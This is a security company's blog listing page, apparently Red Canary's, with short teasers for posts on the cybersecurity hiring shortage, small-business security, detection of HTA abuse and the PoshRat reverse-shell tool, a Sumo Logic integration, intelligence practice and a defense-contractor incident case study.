The industry’s got 99 security problems, and hiring will soon be number one

Chris Rothe

Steve Morgan recently published an article in Forbes titled Cybersecurity’s Labor Epidemic and did a great job compiling research on the looming cybersecurity talent shortage. Several of the most telling statistics and facts: “The demand for the (cybersecurity) workforce is expected to rise to 6 million (globally) by 2019, with a projected shortfall of 1.5 million” stated Michael Brown, CEO … Read More

Fundamental Security for Small Business

Phil Hagen

Small business owners and operators often believe they are less of a target for cyber crime than a large multinational company would be.  However, this is a fallacy – one that may have severe consequences if the small business chooses to ignore establishing a reasonable security posture. Small business is a target due to the simple fact that most criminal … Read More

Microsoft HTML Application (HTA) Abuse, Part Deux

Keith McCammon, Chief Security Officer

In our most recent Detection Profile, we looked at a red team’s post-exploitation activity as detected by Red Canary. The tool was identified through open sources as PoshRat, a PowerShell-based remote access tool that takes advantage of a security policy bypass in Microsoft HTML Applications (HTA) to establish a reverse shell. Unfortunately, HTA abuse is widespread and not limited to … Read More

Integrating Red Canary & Sumo Logic

Keith McCammon, Chief Security Officer

A key step in the Red Canary on-boarding process is understanding customers’ processes and tools so we can configure integrations that minimize the need for IT and security analysts to break workflow and access yet another system. When everything from our context-rich detections to raw endpoint telemetry is integrated with your existing systems, you get immediately useful context without needing to learn a new tool or workflow. We are going … Read More

Red Canary vs. PoshRAT

Red Canary vs. PoshRAT: Detection in the Absence of Malware

Keith McCammon, Chief Security Officer

Detecting malware isn’t easy per se. However, in all but the most sophisticated* attacks, this involves detecting the introduction of something new into an environment. Most of the time this is trivial, some of the time it can be subtle and challenging. But in either case, it is orders of magnitude easier than detection of a malicious insider or an entrenched attacker, both of whom look similar … Read More

Applying the National Intelligence Process to Information Security

Cory Bowline

The “Intelligence” approach to information security is growing in popularity, but many are still struggling to define what this means to their own processes. Red Canary has drawn upon the time-tested and well-defined procedures followed by practitioners of secret intelligence – spies, satellites, drones, etc. – in order to explain how to build and manage an intelligence process that will … Read More

Closing Critical Gaps in the Defense Industrial Base

Cory Bowline

Every organization has gaps in its security posture. There is simply too much surface area and too few resources for organizations to perfectly cover all the gaps. Given enough time, attackers will find and exploit these gaps. Below is a high-level case study of one such incident that occurred a year ago at a mid-sized United States defense contractor. The contractor had appropriate perimeter … Read More